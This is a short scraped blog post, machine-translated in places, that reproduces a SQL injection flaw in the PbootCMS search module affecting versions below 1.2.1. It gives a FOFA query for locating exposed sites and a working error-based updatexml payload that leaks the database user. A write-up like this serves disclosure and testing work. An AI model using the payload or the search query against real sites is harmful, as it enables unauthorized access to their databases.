当前位置:网站首页>Pbootcms search SQL injection vulnerability
Pbootcms search SQL injection vulnerability
2022-07-19 15:22:00 【Lonely and lazy contract】
Vulnerability description
i
PbootCMS Search module exists SQL Inject holes . Through the vulnerability, sensitive information of the database can be obtained
Holes affect
s
PbootCMS < 1.2.1
Space mapping
d
FOFA:app="PBOOTCMS"
Loophole recurrence
The search box page is
Payload by
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
My personal blog
https://gylq.gitee.io/time/
边栏推荐
猜你喜欢
![2021.07.13 [station B] collapsed like this](/img/af/d7d6ae059b4bc2d76c6ea0edb64c82.png)
2021.07.13 [station B] collapsed like this
深层次观点看 AlphaGo 和李世石的 PK
GYM103660H.Distance
Maximum heap and heap sort and priority queue
A - Trees on the level(树的层序遍历)
Leetcode 1296. 划分数组为连续数字的集合(已解决)
Li Hongyi machine learning -- return to July 13, 2022
原始套接字
[gym103660] the 19th Zhejiang University City College Programming Contest vp/s
Cilium & Hubble
随机推荐
【xss靶场10-14】见参数就插:寻找隐藏参数、各种属性
kibana 使用json文档数据
2022/7/17
kube-proxy & Service & Endpoint
Maximum heap and heap sort and priority queue
微信小程序9-发布代码
【codeforces Round#801 Div2 D题 Tree Queries】树形贪心结论
Graph Cuts学习
How to read and save point cloud data with numpy
PostgreSQL在Linux和Windows安裝和入門基礎教程
影响分析:RubyGems未授权访问漏洞(CVE-2022-29176)
人脸技术:不清楚人照片修复成高质量高清晰图像框架(附源代码下载)
【软件测试】——postman接口测试工具完整教程
[leetcode]- dynamic planning-4
A - trees on the level
A - Play on Words
使用flex布局实现局部滚动条
Re understanding of Fourier transform
Leetcode 1296. Divide the array into a set of continuous numbers (provide an idea)
马走斜日(回溯法)